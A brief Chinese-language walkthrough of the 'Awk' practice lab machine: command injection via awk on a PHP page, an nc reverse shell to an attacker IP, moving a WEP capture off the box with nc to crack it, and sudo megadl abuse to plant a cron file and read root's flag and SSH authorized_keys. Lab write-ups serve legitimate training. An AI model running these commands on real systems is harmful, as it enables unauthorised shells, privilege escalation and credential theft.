Awk靶机复盘
一.端口扫描:

二.目录扫描:

三.漏洞测试与利用:
Web的index.php页面:是一个php的信息页面。

访问learning.php页面,进行漏洞测试:

awk指令可以执行系统命令:awk ‘BEGIN {system(“ls”)}’

awk指令也可以读文件:awk ‘//‘ “/etc/passwd”

使用执行系统命令的方式,反弹一下shell
awk ‘BEGIN {system(“rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.226.222 4444 >/tmp/f”)}’


python3 -c ‘import pty;pty.spawn(“/bin/bash”)’
curl + z
stty raw -echo;fg
reset
xterm
四.提权:
进入welcome用户目录:发现了一个WEP-capture.pcap的无线网络数据包,还有一个flag,但是现在还没有权限打开。

WEP:是在无线网络通信中对数据进行封装和加密的过程802.11
用到了aircrack-ng工具:
使用nc命令将数据给传过来:
靶机:nc 192.168.226.222 1234 < WEP-capture.pcap
kali:nc -lvp 1234 > WEP.pcap

aircrack-ng WEP.pcap



megadl命令:
写入文件:
sudo megadl https://mega.nz网址的链接(只能是这个网址,外网) –proxy=外网代理地址 –path=/etc/cron.d/a 注意:path是计划任务的路径,也可以写别的。
读取文件:
sudo megadl –config=/root/root.txt
sudo megadl –config=/root/.ssh/authorized_keys
获取了flag:
编辑获取到了root的密码:
